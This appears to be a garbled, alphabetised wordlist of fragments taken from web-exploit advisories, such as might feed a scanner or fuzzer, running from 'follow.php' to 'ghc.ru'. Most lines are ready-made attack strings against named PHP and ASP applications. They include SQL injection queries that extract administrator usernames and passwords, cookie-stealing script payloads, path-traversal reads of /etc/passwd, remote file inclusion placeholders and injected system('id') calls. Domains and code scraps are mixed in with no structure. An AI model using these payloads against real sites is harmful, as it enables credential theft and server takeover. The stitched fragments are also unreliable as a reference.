follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
follow.php?forum_id=1&,f00=bar,1=waraxe
follow.php?forum_id=1&thread=waraxe
fonction.class.php?path_om=[Shell]
fonctions
/?fontcolor='><script>alert(document.cookie)<
foobar%00
foobla-suggestions-for-joomla.html
foobla-suggestions-joomla
food
foodvendors.php?theme=..
Foojan-WMS1.0%20Full.rar     #
foo.js><
footer
footer.inc.php
footer.inc.php?settings[footer]=..
footer.inc.php?tfooter=shell?
footer_inc.tpl%00&u=bookoo&p=password
footer.php
footer.php?absolutepath=[evil_scripts]
footer.php?admin_mail="><script>alert(document.cookie)<
footer.php?admin="><script>alert(document.cookie)<
footer.php?admin_template_default=..
footer.php?admin_template_default=[LFI]
footer.php?back="><script>alert(document.cookie)<
footer.php?ctrrowcol="><script>alert(
footer.php?enable_cache=false
footer.php?footer_file=[SHELL]
footer.php?GLOBALS[message]=<script>alert("css strikes!");<
footer.php?L_Help=><script>alert(document.cookie)<
footer.php?L_Info=><script>alert(document.cookie)<
footer.php?not_logged_in=1&admin_template_default=..
footer.php?_path[counter]=[RFI]
footer.php?PHPGREETZ_INCLUDE_DIR=Evil
footer.php?PMF_CONF[version]=<script>alert(document.cookie)<
footer.php?query_count=<script>alert(document.cookie)<
footer.php?row_secure[account_theme]=..
footer.php?row_secure[account_theme]=[LFI]
footer.php?_SESSION[nocc_theme]=..
footer.php?_SESSION[nocc_theme]=..%2f..%2Ftmp%2Fphp53.tmp1140662880.att%00
footer.php?SITE_Author_Domain=><script>alert(document.cookie)<
footer.php?SITE_Author=><script>alert(document.cookie)<
_footer.php?skin_path=..
footer.php?TABLE_Width=><script>alert(document.cookie)<
footer.php?theme_root=[Evil_Script]
footer.php?t_login=<script>alert(document.cookie)<
footer.php?ttversion=<script>alert(123);<
footer.php?version[fullname]=<
footer.php?version[homepage]="><script>alert('lol')<
footer.php?version[no]=<script>alert('lol')<
footer.php?version=<script>alert(document.cookie)<
footer.sample.php?Site_Path=[SHELL]
footers.php?tinybb_footers=
foot.phpshell.php	
forcedownload
force_download.php?file=..
force-download.php?file=..
forcedownload.php?file=%2Fetc%2Fpasswd
forcedownload.php?file=[file]
force_download.php?file=force_download.php
force_download.php?file=[Local Path]                       +
force_download.php?filename=..
foren
forensics
forge.joomla.org
forgotpass.asp
forgotpass.html" method="post" name="main" >
forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);<
forgotpass.php" method="POST">
forgotpasswd.php
forgot_password
forgot_password.php
forgotpassword.php
forgot.php
forgot.php (2- put the name of admin and your email and submit)
forgot.php?uname=<ScRiPt%20%0a%0d>alert(213771818860)%3B<
forgottenpassword
forgottenpassword.class.php?system_path=[evil_scripts]
forgotten_password.php) :
forkcms
ForkCMS-3.2.5-Cross-Site-Request-Forgery-Cross-Site-Scripting.html 
form_header.php?noticemsg=<Script>javascript:alert(document.cookie)<
form.html?parentid= methos=POST name=M>
form_[ID]
form.inc.php?install_root=[Shell]
formmailer
formmailer.log
formmailer.php?script_pfad=[Ev!LC0de]
formmail.html
FormMail.pl?recipient=foobar@ush.it&sub
FormMail.pl?recipient=foobar@ush.it&subj
FormMail.pl?recipient=foobar@ush.it&subject=1&redire
FormManager.php?path=<File Inclusion>%00
form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--
form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
form.php?obj=..
form.php?path=[EV!L]
Form.php?path=<File Inclusion>%00
formProcMain.htm
forms
Forms
Forms.php?GLOBALS[sugarEntry]=1&theme=..
forms.php?op2=deleteconfirmed&form_id=5
forms.php?op=delete&form_id="><script>alert(123);<
formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
foro
foro.elhacker.net
foro.nbsecurity.net
foro.undersecurity.net
 for the previous versions of ClipBucket, however they were not fixed in the tested version. 
forum
forum							#
Forum
*&forum=0
ForumAdmin.class.php?gfwww=[Shell]
forum_admin.php?create.edit.9999999%0Aunion%0Aselect%0A1,2,user(),4,5,6,7,8,9,10,11,12,13,14
&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
forum_answer.php?que_id=-1
forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
forum_answer.php?que_id=[SQL]
forum_answer.php?que_id=[SQLi]
forum.asp?forumid=[SQL]
forum.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
forum.asp?iFor={sql}
forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin
forumbackup-%s.sql HTTP
Forum.class.php?gfcommon=[Shell]
forum.class.php?system_path=[evil_scripts]
forum.codecall.net
forum_config.php
forum.coppermine-gallery.net
forumdata.datatype.php?system_path=[evil_scripts]
forum.datatype.php?system_path=[evil_scripts]
forumdisplay.php?f=5              #
forumdisplay.php?fid=1&ascdesc=x
forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C
forumdisplay.php?fid=1&tpp=x
forumdisplay.php?fid=2
forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C
forumdisplay.php?fid=2&sortby='
forumdisplay.php?fid='[sql_query]
forumdisplay.php?GLOBALS[]=
forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart
forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
forum.efrontlearning.net
ForumFactory.class.php?gfcommon=[Shell]
forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users
forum_feed.php?thread=[SQL]
forum_gateway.php?gfwww=[Shell]
forumhost
ForumHTML.class.php?gfwww=[Shell]
ForumHtmlSearchRenderer.class.php?gfwww=[Shell]
forum.imagecms.net
forum.inc.php?addslashes=[function]&asc=[parameter]
forum.inc.php?addslashes=[function]&desc=[parameter]
ForumMessage.class.php?gfcommon=[Shell]
ForumMessageFactory.class.php?gfcommon=[Shell]
forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
forum.php
forum.php3?id_article=-1
forum.php3?id_article=1&id_forum=-1
forum.php?act=7" 
forum.php?admin_theme_dir=..
forum.php?cat=6&tid=33+and+(select+upwd+from+usr+limit+0,1)
forum.php?cat=[SQL]
forum.php?cmd=search&word=Trey&where=author%20and%201=0%20union%20select%20null,null,nick,pass,null,
forum.php?date_show="
forum.php?fd=hack&website=';
forum.php?forum=-1
forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users
forum.php?forum_id=762931
forum.php?forum='><script>alert(document.cookie)<
forum.php?g_include=[shell_script]
forum.php , h4ck3r.in and  all ICW members
forum.php?id=1&page=[Inject here] 
forum.php?id=3(SQL)
forum.php?languagefile=[EV!L]
forum.php?language=[LFI]
forum.php?main_dir=[SHELL] 
forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1
forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1
forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1
forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1
forum.php?menuid=<script>alert('HELLO');<
forum.php?mid=3&smid=0&group=3&thread=-3+UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),CHAR(115, 101, 99, 45, 119, 97, 114),5,6+from+users--
forum.php?mineID=[SQL Injection]
forum.php?mode=thread&thread=[SQL]
forum.php?module=User&command=profile&name=<script>alert(document.cookie);<
forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1
forum.php?modul=posting&topic=[SQL]&channel=3
forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
forum.php?modul=topics&channel=[SQL]
forum.php?msg=[SQL] 
forum.phpmyfaq.de
forum.php?open="
forum.php?postid=999% 20or%201
forum.php\r\n";
forum.php?start=[SQL Injection] 
forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
forum.php?website=[SHELL]         
forumpollrenderer.php?bbPath[path]=..
forumpollrenderer.php?cmd=ls%20-la&bbPath[path]=..
forumpollrenderer.php?cmd=ls%20-la&bbPath[path]=[how far from runcms root?]..
ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 
ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1
forums
Forums
forums.avenir-geopolitique.net
ForumSearchEngine.class.php?gfwww=[Shell]
ForumSearchQuery.class.php?gfcommon=[Shell]
forum-server
forums.exponentcms.org
forums?forum=xxxx&topic= (expliot)
ForumsForUser.class.php?gfcommon=[Shell]
ForumsGroupSearchEngine.class.php?gfwww=[Shell]
forums.html
forums.html 
forums.html", 1); 
ForumsHtmlSearchRenderer.class.php?gfwww=[Shell]
forums?m=posts&q=7475
forums.oscss.org
forums.php
forums.php?action=addtopic&bid=1' method="post">
forums.php?action=board&bid=1' method="post">
forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username]
forums.php?action=flag&subaction=delete&flag_id=[VID]
forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
forums.php?action=savemsg' method="post">
forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null, username,null,null,null FROM dcp5_members WHERE username=%27[username]
forums.php?action=words&subaction=delete&word_id=[VID]
forums.php?action=xcode&subaction=delete&xcode_id=[VID]
forums.php?fid=[code]
forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
forums.php?forum_id=[VID]%3E%3Ciframe%3E
forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
forums.phpmix.org
forums.php?m='&q=3&n=last 
forums.php?m=topics&q=3&n=' 
forums.php?m=topics&s=' 
forums.php?skin=..
forums.php?skin=[Local File]%00
ForumsSearchQuery.class.php?gfcommon=[Shell]
forums.site
forums.soqor.net
forum_statistics
forums.web2project.net
forum_thread_17756_FixPatch-4-0-1.html
forum.time2dine.co.nz
forum_viewforum.php?5.[INJECTION]# 
forum_write.php">                      +
fossgallery
foto
fotogalerie
fotogalerie.php?language=[LFI]
foto-gallery.php
foto.rigma.biz								     |
foto.rigma.biz (affected)		     				     |
fotos
fourm.php?bgid=1&fmid=-1 union select [SQL-INJECTION]--
fourm.php?bgid=-1 union select [SQL-INJECTION]--
fourtwosevenbb
fourtwosevenbb.sourceforge.net
fowlcms
foxypress
foxypress-affiliate.php?aff_id="><script>alert(123);<
foxypress-manage-emails.php
foxypress.php
foxypress-redirect.php
foxypress-settings.php
foxypress-templates.php
fp
fp_gold
fq.php?A=ViewFQ&cid=1[SQL] 
fragments
frame
frame.php?btnStartImport=xxx&importFunction=..
frame.php?op=commentlist&id=1&password=war%2527axe
frame.php?op=filelist&id=1&password=war%2527axe
frame.php?op=peerlist&id=1&password=war%2527axe
frames
frames1_center.php?root=shell
frames1_left.php?root=shell
frames1.php?root=shell
frames1_top.php?root=shell
frameset.php?vwebmailsession=&rframe=[url]
framework
Framework
Framework for more information.
frankmancuso.ca
/?__f=rating_add&art_id=[SQL] 
frb.ru)
free
Free
freearcadescript
freearcadescript.net
freearcadescriptv1.0
FreeBSD
freecms1024
freedown.cgi?id=1
freedown.cgi?id=6
   [free download]
free-download
free_download.php?file={FILE}
Free_File_Hosting
free-file-upload-system
freeForum
freeforum-1.7
freefr.dl.sourceforge.net
freehelpdesk.org
FreeHost
Free_Image_Hosting
free-joke-script
freelance
freelance.asp
freelanceauction.eu
freelancercal
freelance_script.html
freelancescripts
freelance-zone-freelance-auction-script.html
freenas
freenews_functions.inc.php 
freepbx-2.1.3.tgz
freepbx-exploit-phone-home
free-php-ajax-chat
freephpgallery
free-php-petition-signing-script-release
free_php_scripts
free-php-scripts
free-php-scripts.net
freepost-01-r1
freepost0.1-R1
freeqboard
freerealty.rwcinc.net
freerealty.rwcinc.net  )
freeschool
freescripts
freesearch.php?search=2(SQL)
freeside )
freeside.biz
free-simple-software-sql-injection-vulnerability-cve-2010-4298
freestuff_1975_recipe.html
freeticket
freeware
freeware.php?id=2
freeway-ecom
freewebshop
Frequency_Clock
fresh
freshlinks_panel
freshmeat_idb
freshmeat.net
fretsweb
freznoshop
friend
friendlyphp.org
friendmail.php?listing=<
friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
friendster
Frimousse_0.0.2_minimal_install.rar
Frimousse_0.0.2_setup.exe
frimousseweb.free.fr
frmupload.html
frog
frogss.be
from
frOM
fROm
FroM
FROM
from+djsefu_useri--
FROM (.*)image_category
FROM (.*)_m
front
Front%20Door%20-%20BETA
Front%20Door%20-%20v0.4b
frontaccounting
front_content.php?idart=1267%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C
frontdoor
frontdoor-v0.4b.rar
frontend
front_end
front-end
frontend.php?e=".urlencode("echo 31337;unlink('
frontend_render
front-end-upload
front-file-manager
frontpage_ception.php?action=[Blind SQL]
frontpage_ception.php?brute_method=[Blind SQL]
frontpage_ception.php?cmd=[Blind SQL] 
frontpage_ception.php?ftp_server_port=[Blind SQL]
frontpage_ception.php?minutes=[Blind SQL]
frontpage_ception.php?mysql_l=[Blind SQL]
frontpage_ception.php?s_dir=[Blind SQL]
frontpage_ception.php?s_mask=[Blind SQL]
frontpage_ception.php?subj=[Blind SQL]
frontpage_ception.php?submit=[Blind SQL]
frontpage_ception.php?test15_file1=[Blind SQL]
frontpage_ception.php?test3_mp=[Blind SQL]
frontpage_ception.php?userfile14=[Blind SQL]
frontpage_ception.php?userfile1=[Blind SQL]
frontpage.don3app
frontpage.php?app_path=SH3LL?
frontpage.php?setup_folder=';
frontpage_right.php?loadadminpage=[Evil_Code]
frontpage_right.php?loadadminpage=[File]
frontpage_right.php?loadadminpage=Sh3lLz?
frozenpepper.de
frs
FRSFile.class.php?gfcommon=[Shell]
FrsGroupSearchEngine.class.php?gfwww=[Shell]
FrsHtmlSearchRenderer.class.php?gfwww=[Shell]
frs.joomlaboard_component.joomlaboard_1_1_x_branch
FRSPackage.class.php?gfcommon=[Shell]
frs.php?gfcommon=[Shell]
frsrelease
FRSRelease.class.php?gfcommon=[Shell]
FrsSearchQuery.class.php?gfcommon=[Shell]
fs
 -f shell.jpg                #
fshtml
/?f=sofi-wgui-hu
fsphp
FSphp.php?FSPHP_LIB=[evilc0de]
fsphp.sourceforge.net
fs-real-estate-plugin
fsrpowi
fss
fssdownloads
f_state.php" enctype="application
fswiki
[fswiki_path]
ft
ftopic-542-0-days0-orderasc-.html
ftp
FTP
ftp5.ru.freebsd.org
ftpadmin
ftp.azc.uam.mx
ftp_create_group_access.php?gfwww=[Shell]
ftp_create.php?gfwww=[Shell]
ftp.drupal.org
ftp.heanet.ie
ftp_index.php?path=<script>alert(&#039;p0w3r%20ruLeZ&#039;)<
ftp.iptel.org
ftplogin
ftp.phpbb-fr.com
ftp.powerscripts.org
ftp_users.php?plan_id=35&domain=[SQL]
ftp_users.php?plan_id=[SQL]
fttss
fttss.sourceforge.net
[fubarforum_path]
fuju
FulfilledOrdersPage.class.php?base_path=[evil_scripts]
full
Full%20versions
fullarticle.inc.php?rel=[cmd_url]
fullarticle.inc.php?rel=[evil_scripts]
fulldisclosure
fullnews.php?id=<script>alert(document.cookie);<
full.php?u=..
FullProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
Full_Release
fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
full_text.php?nid=4855 and 1=1
full_text.php?nid=4855 and 1=2
full_text.php?nid=4855 and exists (select * from binn_users)
full_text.php?nid=4855 AND (SELECT Count(bu_pass) FROM binn_users) >= 0
full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) >= 0
full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) = 7
full_text.php?nid=[NUM] and 1=1
full_text.php?nid=[NUM] and 1=2
full_text.php?nid=[NUM] and exists (select * from [TABLE])
full_text.php?nid=[NUM] AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) >= 0
full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
full_txt.php?id=19
full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
full_txt.php?id=19\" -p Concurso
full_txt.php?id="><script>alert()<
fun and all members
func,download
func,fileinfo
/?func=fileinfo&id=129
func,finishdown
func.inc.php3
func,startdown
function
functional.php?sr=..
functional_tests.php?sr=..
function.config_load.php?_compile_file=[EV!L]
function.date.php\" target=\"_new\">date<
function.file-exists.php
function.html_select_date.php
function.html_select_time.php
function.inc.php?install_root=[Shell]
function.inc.php?path=[SHELL]
function_list&module_id=11'
function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
FunctionNkinfoweb_v.species.rar
function.php">
function.php?apps_path[libs]=[Rfi]?
function.php?env[include_prefix]=[evil_scripts]
function.php?file=..
function.php?root_path=[Shellcode]
function.php?which=%3Cscript%3Ealert%28
function_post.php?[url]java& 115;cript:
Function_Reference
functions
functions_cms.php?phpbb_root_path=[evil_script]
functions_cms.php?phpbb_root_path=[evil_script] 
functions_folder.php?PATH_Includes=
functions_hacking.php?PATH_Includes=
functions.inc?_CONF[path]=[Evil_Script]
functions.inc?_CONF[path]=[Evil_Script] 
functions.inc.php
functions.inc.php?class=[Local File]
functions.inc.php?config[ppa_root_path]=)<br>"
functions.inc.php?relativer_pfad=';
functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]
functions_message.php?PATH_Includes=
functions_mod_user.php?phpbb_root_path=
functions.php
functions.php?action=edit_profile&type=password">
functions.php?action=edit_profile&type=username
functions.php?action=recoverpass
functions.php?action=ViewPaymentLog&pid=[SQL] 
functions.php?clang=..
functions.php?CONFIG[main_path]=[evil_scripts]
functions.php?DOC_ROOT=[Shell]
functions.php?FORUM_LANGUAGE=
functions.php?FORUM_LANGUAGE=..
_functions.php?GLOBALS[prefix]=[FILE]
functions.php?jcms_root_path=[Evil_Script]
functions.php?location=[EV!L]
functions.php?rd=[evilc0de]
functions.php?root_path=[Evil_Script]
functions.php?x=deleteProject&y=[ID]
functions.php?x=deleteTask&y=[ID]
functions_portal.php?phpbb_root_path=[Evi
functions.queries.php?_SESSION[user_language]=[etc
functions_static_topics.php?phpbb_root_path=[Evil_Script]
functions_url.inc.php
functions_vbseo_url.php
FunGamez
[FunGamez]
funkboard
funzioni
fusion
fusion_admin
FusionForge.class.php?gfcommon=[Shell]
fusionforge.org
fusion_forum
FusionNews
fuzzylime
[fuzzylime]
FWh
fwkfor
fws
g
ga
gabarits.php?cfg_racine=[evil script]
gacl
gadgets
/?gadget=Search
gadmin
gaestebuch
[gaestepath]
galaxies
galeria.php?pictures_folder=.
galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
galeria.php?start=0&kategoria='+union+select+haslo,2,3+from+imgallery_hasla
galerias
galerie
galerie_data
galerie_index.php?action=count&gal_catid=5&tcase=2&gal_id=35&userid=1&username="><script>alert(document.cookie)<
galerie_onfly.php?abild=9997_mr2_2f2f_blue.jpg&width=600&show=2&inpic=Patriotic%20Hackers%20:=))&col=50&size=10&left=1000&heigh
galerie.php5#
galerie.php5?moduleID=1&itemID=%22%3E%3Ciframe%20src=a%20onload=
galerie.php?action=show&pic=10
galerie.php?action=show&pic=10'
Galerie.php?Ent=..
Galerie.php?Lang=..
galerie.php?pfad=
gal_id
galilery
Galilery
Galilery-1.0
gallery
Gallery
gallery2
gallery_admin.php
gallery.class.php?system_path=[evil_scripts]
gallery_data.php";
gallery.datatype.php?system_path=[evil_scripts]
gallery_escorts.php?gallery_id=13'[SQL]
<galleryfolder>
gallery_functions.php?root_path=[evil_scripts]
gallery.html
galleryimages
gallery_list.php?gal=3'
[gallery_path]
$gallery_path
gallery-personals
galleryphoto.php?id=1&photo=
galleryphoto.php?id=1&photo=<font size=15 color=red>Hacked By CoBRa_21<
gallery.php
gallery.php?CatID=[SQL] 
gallery.php?ccms_library_path=[Evil_Code]
gallery.php?gal[]=moziloCMS
gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members
gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users
gallery.php?id='1
gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user
gallery.php?idfestival=7&idgallery=56 (SQL)
gallery.php?idfestival=7 (SQL)
gallery.php?L=2' (MySQLi Found)
gallery.php?page=foto&action=show_custom&id=[SQL] 
gallery.php?p=gal&id=-1
gallery.php?task=delete&amp;id=1
gallery.php?task=edit&amp;id=1
gallery-plugin
galleryscriptlite
gallery-script-lite.html
gallery.sourceforge.net
gallery.terong.biz
gallery_top.inc.php?textFile=Attacker
gallo
galmetapost
galore.co.za
galupki.de
gambling
game
gamebase
gamebase-addon
gameCMS.rar
game.php?game_id=[sql]|
game.php?id=-1+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--
game.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
game.php?yes=1&game_id=-1
games
games-and-entertainment
GameScript150Games
gameserver
gamespe
games.php?id=1
games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc
games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc
gamesscript
Games Script (Galore)
games_site
gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2
gaming
gamma
gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
gantt.php?baseDir=[REMOTE INCLUDE]
gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
gapicms
garr.dl.sourceforge.net
gastbuch.php?start=..
gate.html?mop=modload&name=Forums&file=newtopic';
gateway
gateway.2wire.net
gateway.php?ROOT_PATH=[evil_script]
gator
gazelle
gazelle): " 
Gazelle 1.0 stable
gazie
gazie.sourceforge.net
gb
gbincluder.php?_bFileToInclude=..
gBIndex.php?gBRootPath=evil_scripts?
gBLoginPage.php
gbook
gbook.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
gbook.php?script_pfad=[SHELLCODE]
gbook_setcookie.php?l=..
gBPassword.php
GBP_demo.html
gb.php
gb.php?cmd=dir
gBphpInfo.php
gb.php?lang=[File-To-Require]%00
gbrowse.php?cat_id=[SQL] 
gbscr.gif>
gbufacebook
gbx
gbx_members
[gbx_path]
gca
gcards
gcb
gcb_export.php?gcb=1 AND 1=1
gcms
gdbi_interface.php?action=delete&pid=<iframe>
GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ]
gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
gd-star-rating
ge;
geblog
geccBB
geccBB 
gedcom.inc.php	
gedrecord.php?pid=<iframe>
geekbill
geekhelps.net
geeklog
Geeklog
Geeklog_MVCnPHP-3.0.0.tgz
geekness.eu
gekkocms
gemini
Gemini
gen
genbackup.php
gencms.berlios.de
gen_confirm_mem.php HTTP
gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C
gen_confirm.php?errmsg=%3Cscript%3Ealert%28document.cookie%29;%3C
genealogy
genepi.php?topdir=[Evil_Script]
general
general.127.0.0.1:1339
General_Classifieds
general-classifieds-software.html )
general.functions.php?getFile=[SHELL]
general.init.php?settings[minishowcase_url]=DSecRG&lang=..
general_modern
general.php?mode=perlinfo&config[General][perl_binary]=
General purpose http client that works on a default php install.
General purpose http client that works on a default php install. 
general.[SERVER]:1339
generalsettings.php
general?sort_by=-1 union all select 1,2,3,4,5,6,7,8,9,@@version,11--
generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
GenerateInvoicesPage.class.php?base_path=[evil_scripts]
generate.php?ht_pfad=3vil script?
generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
generator>
<generator>http:\
generic http class
gen_form.php?CLASSPATH=[AvriLhea]                
genium
genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
genre_albums.php?id=[SQLI]
gen_save.php?CLASSPATH=[AvriLhea]                
gentoo.osuosl.org
GENU
GeoAuctions
GeoAuctionsEnterprise
geoblog
german
 (german)
Geschuetzer_Bereich
get
get-6-2009-almlf_com_akszizl2.png
getacoder
get_all",true);
get_article.php?content=%3Cscript%3Ealert%28document.cookie%29;%3C
get_blog_infochannel.inc.php?root_path=[evil_scripts]
get_blog_meta_info.inc.php?root_path=[evil_scripts]
get_calendar.inc.php?root_path=[evil_scripts]
get.cgi? value='+escape(document.cookie)<
getChat.php" enctype="application
getComments
get_content.php?id=1080
getcsslocal.php?css=
getdox.php
get_events.php?includedir=[evilscript] |
getFeed
getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'
get_file.php?download=true&view=
get_file.php?file=[file_to_read]
get_file.php?folder=&file=..
getfile.php?id=5
get_file.php?language=[file_to_include]%00
getflashplayer" 
/?get=grboard
" % (gethostbyname(gethostname()),port))
get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C
get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
get?i=1053
getid3
getid3.php?determined_format[include]=[EV!L]
getid3.php?header=[file]
getimage
get_image.php?lang=&img=..
getimage.php?mode=show&image=.
getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23
getimg.php?img=config.inc.php
get_infochannel.inc.php?root_path=[evil_scripts]
getip_and_mail.php>  |
#getit 
getjs.php?css=
get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E 
get-op5-monitor
","",$_GET['page']);
getpage.php?id=9999999+UNION+SELECT+1,CONCAT_WS(0x3a,user_name,password),3,4,5,6,7+FROM+user+LIMIT+1
getpasses_new.php?idfestival=7 (SQL)
getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C
get.php?data="+escape(xmlhttp.responseText);
get.php?pid=1
getPic.php?p=..
getPic.php?p=[LFD]%00
', $_GET['pilih']) or !file_exists("content
$_GET[pilih].php") or $_GET['pilih'] == 'index'){
getpolicy.php?group=0 and 1=1
get_profile_avatar.php?uid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
GetRecord.php?lib_dir=[Evil_Script]
get_reminders.php?includedir=[evilscript] |
get_session_hash.php?gfwww=[Shell]
get_session_vars.php?path_to_smf=[Shell]
get-simple
GetSimple_2.01
get-simple-cms
get-simple.info
get-started
getstarted.php] 
getStartOptions.php?lang=..
gettcpdump.php?file=..
gettext.php?file=..
getthumb.php?fromfile=getthumb.php&w=..
getting_started
get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
GetTube.dmg
'.$_GET['url'].'
".$_GET['url']."
","",$_GET["u_url"]);
getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
gf
gf-3xplorer
GF-3XPLORER
gforge
gforge-classic
gforge-simple-theme
gforge.site
gforgesite.xxx
ggcms_path
ggcms.weblance.pl
ghc.ru
ghc.ru          |
